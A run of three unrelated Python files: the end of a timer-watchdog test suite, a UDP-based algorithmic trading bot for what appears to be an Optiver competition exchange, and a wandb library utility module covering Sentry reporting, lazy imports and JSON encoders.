def test_acquire_release(self, mock_os_kill):
"""
tests that:
1. a timer can be acquired then released (should not terminate process)
2. a timer can be vacuously released (e.g. no-op)
"""
test_pid = -3
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_not_called()
@mock.patch("os.kill")
def test_valid_timers(self, mock_os_kill):
"""
tests that valid timers are processed correctly and the process is left alone
"""
self.mp_queue.put(self._valid_timer(pid=-3, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-3, scope="test2"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test2"))
self.server._run_watchdog()
self.assertEqual(4, len(self.server._timers))
self.assertTrue((-3, "test1") in self.server._timers)
self.assertTrue((-3, "test2") in self.server._timers)
self.assertTrue((-2, "test1") in self.server._timers)
self.assertTrue((-2, "test2") in self.server._timers)
mock_os_kill.assert_not_called()
if __name__ == "__main__":
run_tests()
|
draw_exploit.py
|
import numpy as np
np.set_printoptions(linewidth=200)
import matplotlib.pyplot as plt
import matplotlib.dates
import socket
import multiprocessing
import time
import pickle
import datetime
UDP_IP = "188.166.115.7"
UDP_BROADCAST_PORT = 7001
UDP_EXCHANGE_PORT = 8001
HELLO_MESSAGE = "TYPE=SUBSCRIPTION_REQUEST".encode("ascii")
percentage_bought_threshold = 0.6
risk_factor = 0.05
class Trader:
def __init__(self, name):
self.name = name
self.position = {}
self.cash = 0
self.stashed_trades = {}
self.acknowledgements = multiprocessing.Queue()
self.reset_ctr = 0
self.oi = OptiverInterface()
self.oi.append_callback(self.handle_stash)
self.oi.append_callback(self.perform_trade)
self.oi.setup_plot_monitor(['SP-FUTURE','ESX-FUTURE'], timeframe = 10)
self.oi.show_plot_monitors()
self.oi.listen()
def stash_buy(self, product, price, volume):
self.stashed_trades[product] = ('BUY', price, volume)
def stash_sell(self, product, price, volume):
self.stashed_trades[product] = ('SELL', price, volume)
def handle_stash(self, entry):
if entry['TYPE'] == 'TRADE':
product = entry['FEEDCODE']
other_product = 'ESX-FUTURE' if product == 'SP-FUTURE' else 'SP-FUTURE'
if other_product in self.stashed_trades and self.stashed_trades[other_product] is not None:
action, price, volume = self.stashed_trades[other_product]
if action == 'BUY':
self.place_buy(other_product, price, volume)
else:
self.place_sell(other_product, price, volume)
self.stashed_trades[other_product] = None
def place_buy(self, product, price, volume):
print("[{}] {} PLACED. PRODUCT: {}. PRICE: {}. VOLUME: {}.".format(datetime.datetime.now(), 'BUY', product, price, volume))
p = multiprocessing.Process(target = self.oi.buy, args = [self.name, product, price, volume, self.acknowledgements])
p.start()
def place_sell(self, product, price, volume):
print("[{}] {} PLACED. PRODUCT: {}. PRICE: {}. VOLUME: {}.".format(datetime.datetime.now(), 'SELL', product, price, volume))
p = multiprocessing.Process(target = self.oi.sell, args = [self.name, product, price, volume, self.acknowledgements])
p.start()
def synchronize(self):
while not self.acknowledgements.empty():
ack = self.acknowledgements.get_nowait()
ack['TIMESTAMP'] = datetime.datetime.now()
if int(ack['VOLUME']) > 0:
print("[{}] {} ACKNOWLEDGED. PRODUCT: {}. PRICE: {}. VOLUME: {}.".format(ack['TIMESTAMP'], ack['ACTION'], ack['FEEDCODE'], ack['PRICE'], ack['VOLUME']))
self.oi.data_queue.put(ack)
if ack['ACTION'] == 'BUY':
self.cash -= float(ack['PRICE']) * ack['VOLUME']
if ack['FEEDCODE'][6:] not in self.position: self.position[ack['FEEDCODE'][6:]] = ack['VOLUME']
else: self.position[ack['FEEDCODE'][6:]] += ack['VOLUME']
else:
self.cash += float(ack['PRICE']) * ack['VOLUME']
if ack['FEEDCODE'][6:] not in self.position: self.position[ack['FEEDCODE'][6:]] = -ack['VOLUME']
else: self.position[ack['FEEDCODE'][6:]] -= ack['VOLUME']
else:
print("[{}] {} REJECTED. PRODUCT: {}.".format(ack['TIMESTAMP'], ack['ACTION'], ack['FEEDCODE']))
print(self)
def __str__(self):
ss = []
ss.append('Cash: ${}.'.format(self.cash))
for product,position in self.position.items():
ss.append('Position {}: {}.'.format(product,position))
ss.append('Total: ${}.'.format(self.cash + sum(position * self.oi.get_time_price(product)[0] for product,position in self.position.items())))
return ' ' + '\n '.join(ss)
def perform_trade(self, entry):
self.synchronize()
if entry['TYPE'] == 'PRICE':
# Get the relevant information on which to base the decision
product = entry['FEEDCODE']
t = entry['TIMESTAMP']
obp,obv,oap,oav = self.oi.get_time_price(product, (t - datetime.timedelta(milliseconds = 1)))
nbp,nbv,nap,nav = self.oi.get_time_price(product, datetime.datetime.now())
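            # obp/oap (obv/oav) are the bid/ask price (volume) quoted just before this
            # update; nbp/nap are the current bid/ask. If the old ask sits more than 0.2
            # below the new bid (or the old bid more than 0.2 above the new ask), the quote
            # has jumped: buy a tick above the old ask (or sell a tick below the old bid)
            # for half of the smaller quoted volume, and stash the opposite trade near the
            # new quote for later execution (see handle_stash).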
if obp > 1e7: return
if oap - nbp < -.2:
v = min(oav,nbv)
self.place_buy(product, oap + .1, int(.5*v))
self.stash_sell(product, nbp - .1, int(.5*v))
self.reset_ctr = 0
elif obp - nap > .2:
v = min(obv,nav)
self.place_sell(product, obp - .1, int(.5*v))
self.stash_buy(product, nap + .1, int(.5*v))
self.reset_ctr = 0
elif self.reset_ctr == 5 and all(x is None for x in self.stashed_trades.values()):
for product,position in self.position.items():
if position != 0:
bp,bv,ap,av = self.oi.get_time_price(product, (t - datetime.timedelta(milliseconds = 1)))
if position > 0:
self.place_sell(product, 1, min(position,int(.5*bv)))
else:
self.place_buy(product, 100000, min(-position,av))
self.reset_ctr = 0
else:
self.reset_ctr += 1
def product_monitor():
plt.show()
class OptiverInterface:
def __init__(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(("", 8005))
self.s.sendto(HELLO_MESSAGE, (UDP_IP, UDP_BROADCAST_PORT))
self.product_monitor_processes = {}
self.product_monitor_figures = []
self.data_queue = multiprocessing.Queue()
self.products = {}
self.s_exchange = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s_exchange.bind(("", 8002))
self.callbacks = []
def synchronize(self):
while not self.data_queue.empty():
entry = self.data_queue.get_nowait()
# if entry['FEEDCODE'] not in set(['ESX-FUTURE', 'SP-FUTURE']):
# print(entry['FEEDCODE'])
self._update_products(entry)
def append_callback(self, c):
self.callbacks.append(c)
def _update_products(self, entry):
assert set(['TYPE','FEEDCODE','TIMESTAMP']) <= set(entry.keys())
assert entry['TYPE'] in set(['PRICE','TRADE'])
# assert entry['FEEDCODE'] in set(['ESX-FUTURE','SP-FUTURE'])
timestamp = entry['TIMESTAMP']
type = entry['TYPE']
product = entry['FEEDCODE']
if product not in self.products: self.products[product] = {'PRICES' : [], 'TRADES' : []}
if type == 'PRICE':
assert set(['BID_PRICE','BID_VOLUME','ASK_PRICE','ASK_VOLUME']) <= set(entry.keys())
bid_price = float(entry['BID_PRICE'])
bid_volume = int(entry['BID_VOLUME'])
ask_price = float(entry['ASK_PRICE'])
ask_volume = int(entry['ASK_VOLUME'])
self.products[product]['PRICES'].append((timestamp, bid_price, bid_volume, ask_price, ask_volume))
else:
assert set(['SIDE','PRICE','VOLUME']) <= set(entry.keys())
side = entry['SIDE']
price = float(entry['PRICE'])
volume = int(entry['VOLUME'])
self.products[product]['TRADES'].append((timestamp,side,price,volume))
def listen(self):
while True:
data, addr = self.s.recvfrom(1024)
msg = data.decode("ascii")
properties = msg.split("|")
entry = {}
for p in properties:
k,v = p.split("=")
entry[k] = v
now = datetime.datetime.now()
print('[{}] {}'.format(now, entry))
entry['TIMESTAMP'] = now
self._update_products(entry)
self.data_queue.put(entry)
for c in self.callbacks:
c(entry)
def get_last_trade(self):
return max(((product,x['TRADES'][-1]) for product,x in self.products.items() if len(x['TRADES']) > 0), key = lambda x : x[1][0])
def get_timeframe(self, product, now = None, timeframe = 60):
if now is None: now = datetime.datetime.now()
data = self.products[product]
new_data = {'PRICES' : [], 'TRADES' : []}
for t,bp,bv,ap,av in data['PRICES']:
if 0 <= (now - t).total_seconds() <= timeframe:
new_data['PRICES'].append((t,bp,bv,ap,av))
new_data['PRICES'].sort(key = lambda x : x[0])
for t,s,p,v in data['TRADES']:
if 0 <= (now - t).total_seconds() <= timeframe:
new_data['TRADES'].append((t,s,p,v))
new_data['TRADES'].sort(key = lambda x : x[0])
return new_data
def get_time_price(self, product, time = None):
# assert product in self.products
if product not in self.products:
print("WARNING: Product {} not in the products.".format(product))
return
if time is None: time = datetime.datetime.now()
if len(self.products[product]['PRICES']) == 0 or time <= self.products[product]['PRICES'][0][0]:
return (1e8,1e8,1e8,1e8)
for t,bp,bv,ap,av in reversed(self.products[product]['PRICES']):
if t <= time:
return (bp,bv,ap,av)
def plot_product_price(self, product, ax, options = {}):
# assert product in self.products
self.synchronize()
if product not in self.products:
print("WARNING: Product {} not in the products.".format(product))
return
if options.get('clear',True): ax.clear()
# Get the data
now = options.get('now', datetime.datetime.now())
timeframe = options.get('timeframe', 60)
data = self.get_timeframe(product, now = now, timeframe = timeframe)
# Get the product prices
ts = list(x[0] for x in self.products[product]['PRICES'])
bps = list(x[1] for x in self.products[product]['PRICES'])
aps = list(x[3] for x in self.products[product]['PRICES'])
ax.step(ts, bps, where = 'post', label = 'bid prices', color = options.get('bid color', 'blue'))
ax.step(ts, aps, where = 'post', label = 'ask prices', color = options.get('ask color', 'red'))
# Get the product trades
timestamps = list(x[0] for x in data['TRADES'])
sides = list(x[1] for x in data['TRADES'])
prices = list(x[2] for x in data['TRADES'])
volumes = list(x[3] for x in data['TRADES'])
ask_ts,ask_ps,ask_vs = [],[],[]
bid_ts,bid_ps,bid_vs = [],[],[]
for t,s,p,v in zip(timestamps,sides,prices,volumes):
if s == 'ASK':
ask_ts.append(t)
ask_ps.append(p)
ask_vs.append(v/4)
else:
bid_ts.append(t)
bid_ps.append(p)
bid_vs.append(v/4)
ax.scatter(ask_ts, ask_ps, s = ask_vs, label = 'ask trades', color = options.get('ask color', 'red'))
ax.scatter(bid_ts, bid_ps, s = bid_vs, label = 'bid trades', color = options.get('bid color', 'blue'))
for t,p,v in zip(ask_ts,ask_ps,ask_vs):
ax.text(t, p, str(v), va = 'baseline', ha = 'center')
for t,p,v in zip(bid_ts,bid_ps,bid_vs):
ax.text(t, p, str(v), va = 'baseline', ha = 'center')
self.set_default_figure_layout(now, timeframe, ax)
ax.set_title('Product: {}'.format(product))
ax.set_ylabel('Price')
if options.get('draw', True): ax.figure.canvas.draw()
def plot_product_volume(self, product, ax, options = {}):
# assert product in self.products
self.synchronize()
if product not in self.products:
print("WARNING: Product {} not in the products.".format(product))
return
if options.get('clear',True): ax.clear()
# Get the data
now = options.get('now', datetime.datetime.now())
timeframe = options.get('timeframe', 60)
data = self.get_timeframe(product, now = now, timeframe = timeframe)
# Get the product volumes
ts = list(x[0] for x in data['TRADES'])
ss = list(x[1] for x in data['TRADES'])
vs = list(x[3] for x in data['TRADES'])
ask_ts,ask_vs,bid_ts,bid_vs = [],[],[],[]
for t,s,v in zip(ts,ss,vs):
bp,bv,ap,av = self.get_time_price(product, t - datetime.timedelta(milliseconds = 1))
if s == 'ASK':
ask_ts.append(t)
ask_vs.append(v/av)
else:
bid_ts.append(t)
bid_vs.append(v/bv)
ax.scatter(ask_ts, ask_vs, label = 'ask volumes', color = 'red', marker = options.get('marker','o'))
ax.scatter(bid_ts, bid_vs, label = 'bid volumes', color = 'blue', marker = options.get('marker','o'))
self.set_default_figure_layout(now, timeframe, ax)
ax.set_title('Volumes')
ax.set_ylabel('Volume')
ax.set_ylim((0,1))
if options.get('draw', True): ax.figure.canvas.draw()
def setup_plot_monitor(self, products, **kwargs):
fig = plt.figure()
timer = fig.canvas.new_timer(interval = 500)
kwargs['draw'] = False
vol_kwargs = kwargs.copy()
trade_kwargs = kwargs.copy()
trade_kwargs['clear'] = False
trade_kwargs['ask color'] = 'cyan'
trade_kwargs['bid color'] = 'magenta'
vol_ax = fig.add_subplot(3,1,3)
for i,product in enumerate(products):
print("Starting a monitor of the prices of product {}...".format(product))
ax = fig.add_subplot(3,1,i+1)
timer.add_callback(self.plot_product_price, product, ax, kwargs.copy())
timer.add_callback(self.plot_product_price, 'TRADE_' + product, ax, trade_kwargs.copy())
if i == len(products) - 1: vol_kwargs['draw'] = True
timer.add_callback(self.plot_product_volume, product, vol_ax, vol_kwargs.copy())
vol_kwargs['clear'] = False
vol_kwargs['marker'] = 'x'
timer.start()
self.product_monitor_figures.append(fig)
return fig
def set_default_figure_layout(self, now, timeframe, ax):
ax.set_xlabel('Time')
ax.set_xlim((now - datetime.timedelta(seconds = timeframe), now))
ax.xaxis.set_major_locator(matplotlib.dates.SecondLocator())
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%Y:%M:%S'))
ax.tick_params(axis = 'x', labelrotation = 90)
def show_plot_monitors(self):
pmp = multiprocessing.Process(target = product_monitor)
pmp.start()
idx = len(self.product_monitor_processes)
self.product_monitor_processes[idx] = (pmp, self.product_monitor_figures)
self.product_monitor_figures = []
return idx
def close_plot_monitors(self, idx = 0):
pmp, figs = self.product_monitor_processes[idx]
pmp.terminate()
del self.product_monitor_processes[idx]
def buy(self, user, feedcode, price, volume, queue = None):
text = "TYPE=ORDER|USERNAME={}|FEEDCODE={}|ACTION=BUY|PRICE={}|VOLUME={}".format(user, feedcode, price, volume)
# print("----------------")
# print(text)
# print("----------------")
# time.sleep(.1 * sleep)
self.s_exchange.sendto(text.encode('ascii'), (UDP_IP, UDP_EXCHANGE_PORT))
data = self.s_exchange.recvfrom(1024)[0]
msg = data.decode("ascii")
properties = msg.split("|")
entry = {}
for p in properties:
k, v = p.split("=")
entry[k] = v
assert entry['TYPE'] == "ORDER_ACK"
entry['TYPE'] = 'TRADE'
entry['FEEDCODE'] = 'TRADE_' + entry['FEEDCODE']
entry['VOLUME'] = int(entry['TRADED_VOLUME'])
entry['SIDE'] = 'ASK'
entry['ACTION'] = 'BUY'
if queue is None:
return entry
else:
queue.put(entry)
def sell(self, user, feedcode, price, volume, queue = None):
text = "TYPE=ORDER|USERNAME={}|FEEDCODE={}|ACTION=SELL|PRICE={}|VOLUME={}".format(user, feedcode, price, volume)
# print("----------------")
# print(text)
# print("----------------")
# time.sleep(sleep * .1)
self.s_exchange.sendto(text.encode('ascii'), (UDP_IP, UDP_EXCHANGE_PORT))
data = self.s_exchange.recvfrom(1024)[0]
msg = data.decode("ascii")
properties = msg.split("|")
entry = {}
for p in properties:
k, v = p.split("=")
entry[k] = v
assert entry['TYPE'] == "ORDER_ACK"
entry['TYPE'] = 'TRADE'
entry['FEEDCODE'] = 'TRADE_' + entry['FEEDCODE']
entry['VOLUME'] = -int(entry['TRADED_VOLUME'])
entry['SIDE'] = 'BID'
entry['ACTION'] = 'SELL'
if queue is None:
return entry
else:
queue.put(entry)
if __name__ == "__main__":
# Test plotting
trader = Trader(name = 'baas-2')
|
util.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import binascii
import colorsys
import contextlib
import codecs
import errno
import hashlib
import json
import getpass
import logging
import math
import os
import re
import shlex
import socket
import subprocess
import sys
import threading
import time
import random
import stat
import shortuuid
import importlib
import types
import yaml
from datetime import date, datetime
import platform
from six.moves.urllib.parse import urlparse
import click
import requests
import six
from six.moves import queue
import textwrap
from sys import getsizeof
from collections import namedtuple
from six.moves.collections_abc import Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from sentry_sdk import configure_scope
from wandb.env import error_reporting_enabled
import wandb
from wandb.errors import CommError
from wandb.old.core import wandb_dir
from wandb import env
logger = logging.getLogger(__name__)
_not_importable = set()
MAX_LINE_SIZE = 4 * 1024 * 1024 - 100 * 1024 # imposed by back end
IS_GIT = os.path.exists(os.path.join(os.path.dirname(__file__), "..", ".git"))
# these match the environments for gorilla
if IS_GIT:
SENTRY_ENV = "development"
else:
SENTRY_ENV = "production"
if error_reporting_enabled():
sentry_sdk.init(
dsn="https://a2f1d701163c42b097b9588e56b1c37e@o151352.ingest.sentry.io/5288891",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV,
)
POW_10_BYTES = [
("B", 10 ** 0),
("KB", 10 ** 3),
("MB", 10 ** 6),
("GB", 10 ** 9),
("TB", 10 ** 12),
("PB", 10 ** 15),
("EB", 10 ** 18),
]
POW_2_BYTES = [
("B", 2 ** 0),
("KiB", 2 ** 10),
("MiB", 2 ** 20),
("GiB", 2 ** 30),
("TiB", 2 ** 40),
("PiB", 2 ** 50),
("EiB", 2 ** 60),
]
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc, delay=False):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
if delay:
time.sleep(2)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
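# Illustrative usage sketch ("do_work" is a placeholder for caller code):
#   try:
#       do_work()
#   except Exception as e:
#       sentry_reraise(e)  # report to Sentry, then re-raise with the original traceback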
def sentry_set_scope(process_context, entity, project, email=None, url=None):
# Using GLOBAL_HUB means these tags will persist between threads.
# Normally there is one hub per thread.
with sentry_sdk.hub.GLOBAL_HUB.configure_scope() as scope:
scope.set_tag("process_context", process_context)
scope.set_tag("entity", entity)
scope.set_tag("project", project)
if email:
scope.user = {"email": email}
if url:
scope.set_tag("url", url)
def vendor_setup():
"""This enables us to use the vendor directory for packages we don't depend on
Returns a function to call after imports are complete. Make sure to call this
function or you will modify the user's path which is never good. The pattern should be:
reset_path = vendor_setup()
# do any vendor imports...
reset_path()
"""
original_path = [directory for directory in sys.path]
def reset_import_path():
sys.path = original_path
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, "vendor")
vendor_packages = ("gql-0.2.0", "graphql-core-1.1")
package_dirs = [os.path.join(vendor_dir, p) for p in vendor_packages]
for p in [vendor_dir] + package_dirs:
if p not in sys.path:
sys.path.insert(1, p)
return reset_import_path
def apple_gpu_stats_binary():
parent_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(parent_dir, "bin", "apple_gpu_stats")
def vendor_import(name):
reset_path = vendor_setup()
module = import_module(name)
reset_path()
return module
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
    :param (str) required: A string error message to raise (via wandb.Error) if the import fails
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
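# Illustrative usage sketch ('scipy.stats' is just an example module path):
#   scipy_stats = get_module("scipy.stats")
#   if scipy_stats is not None:
#       scipy_stats.norm(0, 1).cdf(0.5)
#   # or make the dependency mandatory:
#   yaml_mod = get_module("yaml", required="yaml is required for this feature")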
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
    We use this for tensorflow and other optional libraries, primarily at the top module level.
"""
# The lint error here is incorrect.
def __init__(
self, local_name, parent_module_globals, name, warning=None
): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
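# Illustrative usage sketch (the module name is just an example): the heavy import
# is deferred until the first attribute access on the proxy object.
#   tf = LazyLoader("tf", globals(), "tensorflow")
#   tf.constant(1)  # tensorflow is actually imported here, on first use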
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
raise AttributeError()
np = get_module("numpy")
MAX_SLEEP_SECONDS = 60 * 5
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def app_url(api_url):
if "://api.wandb.test" in api_url:
# dev mode
return api_url.replace("://api.", "://app.")
elif "://api.wandb." in api_url:
# cloud
return api_url.replace("://api.", "://")
elif "://api." in api_url:
# onprem cloud
return api_url.replace("://api.", "://app.")
# wandb/local
return api_url
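# Illustrative mapping (hostnames are examples only):
#   app_url("https://api.wandb.ai")    ->  "https://wandb.ai"        (cloud)
#   app_url("https://api.wandb.test")  ->  "https://app.wandb.test"  (dev mode)
#   app_url("http://localhost:8080")   ->  "http://localhost:8080"   (wandb/local)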
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split(".")[0] + "." + o.__class__.__name__
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith("tensorflow.") and (
"Tensor" in typename or "Variable" in typename
)
def is_tf_eager_tensor_typename(typename):
return typename.startswith("tensorflow.") and ("EagerTensor" in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith("torch.") and (
"Tensor" in typename or "Variable" in typename
)
def is_fastai_tensor_typename(typename):
return typename.startswith("fastai.") and ("Tensor" in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith("pandas.") and "DataFrame" in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith(".Figure")
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ("outward", 0.0)
if isinstance(position, str):
if position == "center":
position = ("axes", 0.5)
elif position == "zero":
position = ("data", 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == "outward" and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted."
)
return obj
def matplotlib_to_plotly(obj):
obj = ensure_matplotlib_figure(obj)
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
return tools.mpl_to_plotly(obj)
def matplotlib_contains_images(obj):
obj = ensure_matplotlib_figure(obj)
return any(len(ax.images) > 0 for ax in obj.axes)
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
try:
obj = obj.eval()
except RuntimeError:
obj = obj.numpy()
elif is_pytorch_tensor_typename(typename) or is_fastai_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.numpy()
else:
return obj.item(), True
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
if isinstance(obj, float) and math.isnan(obj):
obj = None
elif isinstance(obj, bytes):
obj = obj.decode("utf-8")
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
elif callable(obj):
obj = (
"{}.{}".format(obj.__module__, obj.__qualname__)
if hasattr(obj, "__qualname__") and hasattr(obj, "__module__")
else str(obj)
)
elif isinstance(obj, float) and math.isnan(obj):
obj = None
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn(
"Serializing object of type {} that is {} bytes".format(
type(obj).__name__, getsizeof(obj)
)
)
return obj, converted
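# Illustrative examples of the (value, converted) contract:
#   json_friendly(b"bytes")                ->  ("bytes", True)
#   json_friendly(datetime(2020, 1, 1))    ->  ("2020-01-01T00:00:00", True)
#   json_friendly(float("nan"))            ->  (None, True)
#   json_friendly("already serializable")  ->  ("already serializable", False)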
def json_friendly_val(val):
"""Make any value (including dict, slice, sequence, etc) JSON friendly"""
if isinstance(val, dict):
converted = {}
for key, value in six.iteritems(val):
converted[key] = json_friendly_val(value)
return converted
if isinstance(val, slice):
converted = dict(
slice_start=val.start, slice_step=val.step, slice_stop=val.stop
)
return converted
val, _ = json_friendly(val)
if isinstance(val, Sequence) and not isinstance(val, six.string_types):
converted = []
for value in val:
converted.append(json_friendly_val(value))
return converted
else:
if val.__class__.__module__ not in ("builtins", "__builtin__"):
val = str(val)
return val
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return (
{
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size,
},
True,
)
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ["DISPLAY", "WAYLAND_DISPLAY", "MIR_SOCKET"]
_WEBBROWSER_NAMES_BLACKLIST = ["www-browser", "lynx", "links", "elinks", "w3m"]
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if "linux" in sys.platform and not any(
os.getenv(var) for var in _DISPLAY_VARIABLES
):
launch_browser = False
try:
browser = webbrowser.get()
if hasattr(browser, "name") and browser.name in _WEBBROWSER_NAMES_BLACKLIST:
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id():
    # ~2.8 trillion possible run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list("0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(8)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
if hasattr(obj, "json_encode"):
return obj.json_encode()
# if hasattr(obj, 'to_json'):
# return obj.to_json()
tmp_obj, converted = json_friendly(obj)
if converted:
return tmp_obj
return json.JSONEncoder.default(self, obj)
class WandBJSONEncoderOld(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
    This encoder serializes numpy-like objects to plain lists without compressing them into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
